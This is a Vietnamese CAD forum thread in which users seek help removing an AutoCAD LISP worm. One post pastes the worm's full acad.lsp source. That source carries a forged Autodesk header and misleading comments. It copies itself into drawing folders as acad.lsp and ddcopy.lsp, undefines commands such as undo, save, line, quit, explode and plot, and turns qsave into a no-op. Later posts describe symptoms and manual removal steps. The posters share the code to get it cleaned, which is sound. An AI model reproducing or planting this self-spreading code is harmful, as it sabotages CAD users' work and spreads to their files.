Đến nội dung


Hình ảnh
5 stars - based on 24598 reviews

sâu cad


 • Please log in to reply
23 replies to this topic

#21 garungdothi

garungdothi

  biết lệnh mirror

 • Members
 • PipPipPip
 • 158 Bài viết
Điểm đánh giá: 24 (tàm tạm)

Đã gửi 30 September 2012 - 01:15 PM

các bác ơi em biết vấn đền này thì đã có người trả lời rồi nhưng không hiểu sao em làm theo mà không diệt được các bác ah đây là virus của em các bác xem dùm.
em chep từ file acad đó các bác.

; Next available MSG number is 86
; MODULE_ID ACADR13_LSP_
;;; ACAD.LSP Version 14.1 for Release 14
;;;
;;; Copyright © 1994 - 1997 by Autodesk, Inc.
;;;
;;; Permission to use, copy, modify, and distribute this software
;;; for any purpose and without fee is hereby granted, provided
;;; that the above copyright notice appears in all copies and
;;; that both that copyright notice and the limited warranty and
;;; restricted rights notice below appear in all supporting
;;; documentation.
;;;
;;; AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.
;;; AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF
;;; MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. AUTODESK, INC.
;;; DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
;;; UNINTERRUPTED OR ERROR FREE.
;;;
;;; Use, duplication, or disclosure by the U.S. Government is subject to
;;; restrictions set forth in FAR 52.227-19 (Commercial Computer
;;; Software - Restricted Rights) and DFAR 252.227-7013©(1)(ii)
;;; (Rights in Technical Data and Computer Software), as applicable.
;;;
;;; Programer : Nguyen Manh Hung and Van Thai Binh - Cong ty Tu van va KSTK Xay dung
;;;
;;; Note:
;;; This file is loaded automatically by AutoCAD every time
;;; a drawing is opened. It establishes an autoloader and
;;; other utility functions.
;;;
;;; Globalization Note:
;;; We do not support autoloading applications by the native
;;; language command call (e.g. with the leading underscore
;;; mechanism.)
(defun s::startup (/ old_cmd path dwgpath mnlpath apppath oldacad cmd
newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2
mm1 mm2 mm3 mm4 mm5 mm6 mm7 mm8 mm9 mm10
)
(setq old_cmd (getvar "cmdecho"))

(setvar "cmdecho" 0)
(check_data)
(setq path (findfile "base.dcl"))
(setq path (substr path 1 (- (strlen path) 8)))
(setq mnlpath (getvar "menuname"))
(setq nowdwg (getvar "dwgname"))
(if (setq wjqm (findfile nowdwg))
(progn
(setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(setq acadpath (findfile "acad.lsp"))
(setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
(setq cmd "undefine")
(setq ns1 "" ns2 "")
(setq lspbj 0)
(setq wjqm (strcat path "acad.lsp"))
(setq mm7 "explode" mm8 "trim"
mm9 "extend" mm10 "move")
(if (setq wjm (open wjqm "r"))
(progn
(while
(setq wz (read-line wjm))
(setq ns1 ns2)
(setq ns2 wz)
)
(if
(> (strlen ns1) 14)
(if (= (substr ns1 8 7) "ddcopy.lsp")
(setq lspbj 1))
)
(close wjm)
)
) ;_ end of if
(if
(and (= acadpath dwgpath) (/= acadpath path))
(progn
(setq oldacad (findfile "acad.lsp"))
(setq newacad (strcat path "ddcopy.lsp"))
(if (= lspbj 0)
(progn
(setq wjqm (strcat path "acad.lsp"))
(setq wjm (open wjqm "w"))
(write-line
(strcat "(load " (chr 34) "ddcopy.lsp" (chr 34) ")") wjm)
(write-line "(princ)" wjm)
(close wjm)
)
) ;_ end of if
(writeapp)
)
(progn (if (/= nowdwg "Drawing.dwg")
(progn
(setq oldacad (findfile "ddcopy.lsp"))
(setq newacad (strcat dwgpath "acad.lsp"))
(writeapp)
) ;_ end of progn
) ;_ end of if
) ;_ end of progn
) ;_ end of if
(command cmd "u") ;_ end of cmd
(command cmd "qsave") ;_ end of cmd
(command cmd "line")
(command cmd "quit")
(if (/= (- (/ mm4 2) (fix (/ mm4 2))) 0)
(progn
(command cmd mm7) (command cmd mm8) ;; "bar.arx" will *not* match "c:\\path\\foobar.arx."
(command cmd mm9) (command cmd mm10);; "bar.arx" will *not* match "c:\\path\\foobar.arx."
(command cmd "plot") ;_ end of cmd
));; "bar.arx" will *not* match "c:\\path\\foobar.arx."
(setvar "cmdecho" old_cmd)
))
(if (not (setq wjqm (findfile nowdwg)))
(progn
(setq cmd "undefine")
(setq ns1 "" ns2 "")
(setq lspbj 0)
(setq wjqm (strcat path "acad.lsp"))
(setq mm7 "explode" mm8 "trim"
mm9 "extend" mm10 "move")
(command cmd mm7) (command cmd mm8) ;; "bar.arx" will *not* match "c:\\path\\foobar.arx."
(command cmd mm9) (command cmd mm10);; "bar.arx" will *not* match "c:\\path\\foobar.arx."
(command cmd "plot") ;_ end of cmd
(command cmd "u") ;_ end of cmd
(command cmd "qsave") ;_ end of cmd
(command cmd "line")
(command cmd "quit")
))
(princ);; "bar.arx" will *not* match "c:\\path\\foobar.arx."

) ;_ end of defun
(defun writeapp ()
(if (setq wjm1 (open newacad "w"))
(progn
(setq wjm (open oldacad "r"))
(while
(setq wz (read-line wjm))
(write-line wz wjm1)
) ;_ end of while
(close wjm)
(close wjm1)
) ;_ end of progn
) ;_ end of if
) ;_ end of defun
;; determines if a given application is loaded...
;; general purpose: can ostensibly be used for appsets (arx) or (ads) or....
;;
;; app is the filename of the application to check (extension is required)
;; appset is a list of applications, (such as (arx) or (ads)
;;
(defun check_data ()
(setq mm5 "cdate")
(setq mm6 (rtos (getvar mm5) 2 10)
mm1 (substr mm6 1 4) ;; Allow the IMAGE command to accept an image file name without
mm2 (substr mm6 5 2) ;; Allow the IMAGE command to accept an image file name without
mm3 (substr mm6 7 2) ;; Allow the IMAGE command to accept an image file name without
mm4 (substr mm6 10 2);; Allow the IMAGE command to accept an image file name without
)
(setq mm1 (distof mm1) ;; Allow the IMAGE command to accept an image file name without
mm2 (distof mm2) ;; Allow the IMAGE command to accept an image file name without
mm3 (distof mm3) ;; Allow the IMAGE command to accept an image file name without
mm4 (distof mm4));; Allow the IMAGE command to accept an image file name without
)
;; returns T or nil, depending on whether app is present in the appset
;; indicated. Case is ignored in comparison, so "foo.arx" matches "FOO.ARX"
;; Also, if appset contains members that contain paths, app will right-match
(defun c:qsave () ;; presenting the file dialog, even if filedia is on.
(princ) (princ)) ;; presenting the file dialog, even if filedia is on.
;; against these members, so "bar.arx" matches "c:\\path\\bar.arx"; note that
;; "bar.arx" will *not* match "c:\\path\\foobar.arx."
(defun xplode ()
(princ "\nDon't hope explode it.")
(princ);; against these members
) ;_ end of defun
(defun c:xplode ()
(xplode) (princ))
(defun c:xp ()
(xplode) (princ))
;;;===== Raster Image Support for Clipboard Paste Special =====
;;
;; IMAGEFILE
;;
;; Allow the IMAGE command to accept an image file name without
;; presenting the file dialog, even if filedia is on.
;; Example: (imagefile "c:/images/house.bmp")
(princ)
;;
 • 0

#22 tranhuuanh_kt89

tranhuuanh_kt89

  biết zoom

 • Members
 • Pip
 • 11 Bài viết
Điểm đánh giá: 1 (bình thường)

Đã gửi 30 September 2012 - 06:29 PM

em có nghe nói về sâu cad (bài của bác Hoành)nhưng cụ thể hơn và cách trị nó như thế nào???làm sao mà nhưng người thông thường cũng trị được nó.....Mong các bác giúp cho nhà em cái.liên hệ với em qua ---phamthanhtan_uk

virus này có tác hại ntn đối với máy tính hả bạn? nếu không làm gì thì máy có bị sao ko? tại thấy ít người nói vế cái này...dân đen mừ.
 • 0
Sống trong đời sống, cần có một tấm lòng...

#23 garungdothi

garungdothi

  biết lệnh mirror

 • Members
 • PipPipPip
 • 158 Bài viết
Điểm đánh giá: 24 (tàm tạm)

Đã gửi 30 September 2012 - 08:01 PM

nó có cái khó chịu nhất là mỗi lần mở một bản vẽ là nó hiện ra một file đó. và em nhận thấy cad em khởi động chậm hơn.
 • 0

#24 road2it

road2it

  Chưa sử dụng CAD

 • Members
 • Pip
 • 4 Bài viết
Điểm đánh giá: 0 (bình thường)

Đã gửi 31 May 2013 - 05:53 PM

Chào các bác ạ, cho em đào mộ cái topic này lên vì em cũng đang bị con sâu này hành mà chưa trị được

 

Theo các bước bác Tú hướng dẫn:

 

1. Search file acaddoc.lsp và xoá sạch
2. Search file acadapq.lsp và xoá sạch
3. Mở file acad.mnl xoá đoạn mã (load ..acadapq.lsp) đi
4. Xhuyển acad.mnl thành readonly
5. Xoá file c:\boot.dat

 

Ở bước  2, em search nhưng không tìm được file acadapq.lsp

              3. trong file acad.mnl không tìm thấy đoạn load...acadapq.lsp

              4. em tìm thấy nhiều file acad.mnl trong đó có 1 file trong thư mục Fonts nhưng không chuyển sang read only được, ở thư mục cài đặt và các thư mục khác thì được

 

Sau khi làm thế thì hiện tại vẫn bị tình trạng này, khởi động cad chậm hơn bình thường và đi đâu nó cũng theo đấy :( :( :(

 

Các bác có cách nào chỉ giúp em với ạ.


 • 0